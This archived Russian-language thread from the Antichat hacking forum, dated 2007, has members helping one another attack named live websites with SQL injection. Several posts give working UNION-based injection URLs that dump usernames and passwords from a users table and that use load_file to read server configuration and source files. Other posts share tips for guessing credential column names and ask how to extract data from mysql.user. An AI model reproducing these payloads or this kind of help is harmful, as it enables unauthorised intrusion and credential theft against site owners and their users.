ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
15.11.2007, 15:22
|
|
Познающий
Регистрация: 10.05.2007
Сообщений: 38
Провел на форуме:
453576
Репутация:
100
|
|
Это смотря окуда ты этот пароль взял... Скорее всего какой то свой алгоритм имхо...
http://www.curufc.com/index.php?pageid=-1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(concat_ ws(0x05,id,username,password),0x72),0x72),4,5,6,7, 8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,2 5,26,27,28,29,30,31,32+from+users+limit+1,1/*
|
|
|
15.11.2007, 18:30
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
Сообщение от 5taY3r
http://www.curufc.com/index.php?pageid=-1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(concat_ ws(0x05,id,username,password),0x72),0x72),4,5,6,7, 8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,2 5,26,27,28,29,30,31,32+from+users+limit+1,1/*
да скорее всего самописный какойто (оч похоже на base64, но это не просто base64 а что то еще, хотя хз), читай скрипты, ищи где это осуществляется:
вот тебе httpd.conf
Код:
http://www.curufc.com/index.php?pageid=-1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(load_file('/usr/local/apache/conf/httpd.conf'),0x71),0x71),4,5,6,8,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32/*
вот тебе index.php
Код:
http://www.curufc.com/index.php?pageid=-1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(load_file('/home/vhost/curufc.com/html/index.php'),0x71),0x71),4,5,6,8,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32/*
вобщем ковыряй, если это действительно нужно
__________________
Карфаген должен быть разрушен...
|
|
|
|
20.11.2007, 03:21
|
|
Новичок
Регистрация: 18.09.2007
Сообщений: 3
Провел на форуме:
14301
Репутация:
1
|
|
помогите доработать скулю, если ето возможно
http://www.kauma.ru/showpicture.php?image=-3+union+select+1,2,3,4,5,6,7,8,9,1/*
Последний раз редактировалось xploited; 20.11.2007 в 04:11..
|
|
|
|
20.11.2007, 08:39
|
|
Познающий
Регистрация: 06.09.2006
Сообщений: 94
Провел на форуме:
397064
Репутация:
15
|
|
Так, сюда вроде задают вопросы, вот и я задам, надеюсь не будет оффтопом.
Нашел сайт. Делал Sql и получал вот такую страницу при запросе =1'
Скрин номер раз
Ну в принципе все стандартно, тока почему то на отдельной странице.
Но если сделать кривой запрос, например: ='-1 то получаем вообще вот такое:
скрин номер два
Скажите что за баг, и можно ли его испльзовать? Есть ли полезность?
Заранее спасибо... |
|
|
|
20.11.2007, 12:45
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
2Twiddle обычная sql-inj, скорей всего можно исползовать, ну и значит определеннные даннные ты наверное сможешь получить
__________________
Карфаген должен быть разрушен...
|
|
|
|
20.11.2007, 23:36
|
|
Новичок
Регистрация: 09.11.2007
Сообщений: 24
Провел на форуме:
60954
Репутация:
3
|
|
Скажите народ, вот если сайтик на одних html' ках построен, то есть без скриптов всяких, получается и зацепится не за что?
|
|
|
|
21.11.2007, 00:34
|
|
Members of Antichat - Level 5
Регистрация: 24.10.2007
Сообщений: 256
Провел на форуме:
6905523
Репутация:
1174
|
|
Ситуация такая:
Имею эстонский сайт с инъектом, кол-во колонок подобрал, есть табличка users. Версия мускула 4.1.22. Трабла в том, что не могу подобрать столбцы в users. Ни один из ниже перечисленных не подходит.
Код:
id
login
user
name
nickname
nick
user_name
password
pass
pwd
pws
User_password
host
Прошу, если кто-то сталкивался с такой проблемой подсказать.
Быть может имена столбцов на национальном языке.. |
|
|
|
21.11.2007, 10:11
|
|
Познающий
Регистрация: 24.12.2006
Сообщений: 90
Провел на форуме:
1292655
Репутация:
168
|
|
Сообщение от ZAMUT
Ситуация такая:
Имею эстонский сайт с инъектом, кол-во колонок подобрал, есть табличка users. Версия мускула 4.1.22. Трабла в том, что не могу подобрать столбцы в users. Ни один из ниже перечисленных не подходит.
Прошу, если кто-то сталкивался с такой проблемой подсказать.
Быть может имена столбцов на национальном языке..
попробуй проверить или есть права на чтение файлов /load_file(_полный_путь_к_файлу_)/ если есть то всё таблицы, колонки можно вытянуть из скриптов.
2. это способ который помогает мне в 80% - просматриваешь исходники страницы и находишь что-то в этом роде "....<input type="password" name="pwd"/>....", значение параметра name, обычно, совпадает с именем столбца.
|
|
|
|
21.11.2007, 11:08
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
2 Zamut ентих вариантов стандартных, еще целая куча может быть, причем не на национальном языке, дай линк, попробую помочь
а по-эстонски я знаю:
login:
Код:
kasutaja
kasutajanimi
kasutajatunnus
pass:
__________________
Карфаген должен быть разрушен...
|
|
|
|
21.11.2007, 18:56
|
|
Members of Antichat - Level 5
Регистрация: 24.10.2007
Сообщений: 256
Провел на форуме:
6905523
Репутация:
1174
|
|
2 big_BRAT спасибо, частично помогло)
Теперь ситуация такая:
имею большой ресурс, кол-во столбцов известно, (!ни один из них не выводится на экран!),есть табличка mysql.user в табличке есть столбцы user и password. Есть ли возможность, что-то достать ?
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
